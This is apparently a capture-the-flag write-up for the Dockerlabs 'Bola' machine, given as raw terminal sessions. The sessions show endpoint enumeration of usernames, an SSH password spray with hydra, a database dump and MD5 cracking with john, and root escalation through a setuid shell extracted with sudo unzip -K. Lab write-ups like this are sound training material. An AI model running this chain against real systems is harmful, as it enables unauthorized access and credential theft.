Dockerlabs-Bola

[root@kali] /home/kali/Bola  
❯ dirsearch -u http://172.17.0.2:12345/                    

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://172.17.0.2:12345/

[10:24:22] Scanning:                                                                                                                            
[10:24:29] 400 -   167B - /console                                          
[10:24:32] 405 -   153B - /login                                            
[10:24:37] 308 -   245B - /user  ->  http://172.17.0.2:12345/user/          
[10:24:37] 400 -    54B - /user/                                            
[10:24:37] 200 -    65B - /user/2
[10:24:37] 200 -    69B - /user/1
[10:24:37] 200 -    73B - /user/3                                           
                                                                             
Task Completed                                     

[root@kali] /home/kali/Bola  
❯ for i in {1..100}; do curl -s "http://172.17.0.2:12345/user/$i" | jq -r '.username' >> users.txt; done 


[root@kali] /home/kali/Bola  
❯ cat users.txt 
alice
bob
charlie
diana
edward
fiona
george
hannah
ian
julia
kevin
laura
michael
nina
oscar
paula
quinn
rachel
steven
tina

[root@kali] /home/kali/Bola  
❯ hydra -L users.txt  ssh://172.17.0.2 -I  -e nsr
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-24 10:38:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 300 login tries (l:100/p:3), ~19 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2   login: steven   password: steven

steven@1f62a5cad7a9:~$ ss -tuln
Netid         State          Recv-Q         Send-Q                 Local Address:Port                  Peer Address:Port        Process         
tcp           LISTEN         0              80                         127.0.0.1:3306                       0.0.0.0:*                           
tcp           LISTEN         0              128                          0.0.0.0:22                         0.0.0.0:*                           
tcp           LISTEN         0              128                          0.0.0.0:12345                      0.0.0.0:*                           
tcp           LISTEN         0              128                             [::]:22                            [::]:*                           
steven@1f62a5cad7a9:~$ mysql -usteven -psteven
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use secretito
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [secretito]> select * from usuarios;
+----+-----------+----------------------------------+
| id | usuario   | password                         |
+----+-----------+----------------------------------+
|  1 | alice     | 8bdffaa69d328c1d4ae3aeadc97de223 |
|  2 | bob       | d8578edf8458ce06fbc5bb76a58c5ca4 |
|  3 | charlie   | e99a18c428cb38d5f260853678922e03 |
|  4 | baluadmin | aa87ddc5b4c24406d26ddad771ef44b0 |
|  5 | diana     | e10adc3949ba59abbe56e057f20f883e |
+----+-----------+----------------------------------+
5 rows in set (0.000 sec)

MariaDB [secretito]> 

[root@kali] /home/kali/Bola  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt  --format=Raw-MD5 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
estrella         (?)     
1g 0:00:00:00 DONE (2025-06-24 10:35) 100.0g/s 19200p/s 19200c/s 19200C/s 123456..november
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

baluadmin@1f62a5cad7a9:~$ sudo -l
Matching Defaults entries for baluadmin on 1f62a5cad7a9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User baluadmin may run the following commands on 1f62a5cad7a9:
    (ALL) NOPASSWD: /usr/bin/unzip

baluadmin@1f62a5cad7a9:~$ cp /bin/sh .
baluadmin@1f62a5cad7a9:~$ chmod +s sh
baluadmin@1f62a5cad7a9:~$ zip shell.zip sh
  adding: sh (deflated 52%)
baluadmin@1f62a5cad7a9:~$ sudo unzip -K shell.zip
Archive:  shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: sh                      
baluadmin@1f62a5cad7a9:~$ ./sh -p
# id
uid=1001(baluadmin) gid=1001(baluadmin) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baluadmin)
#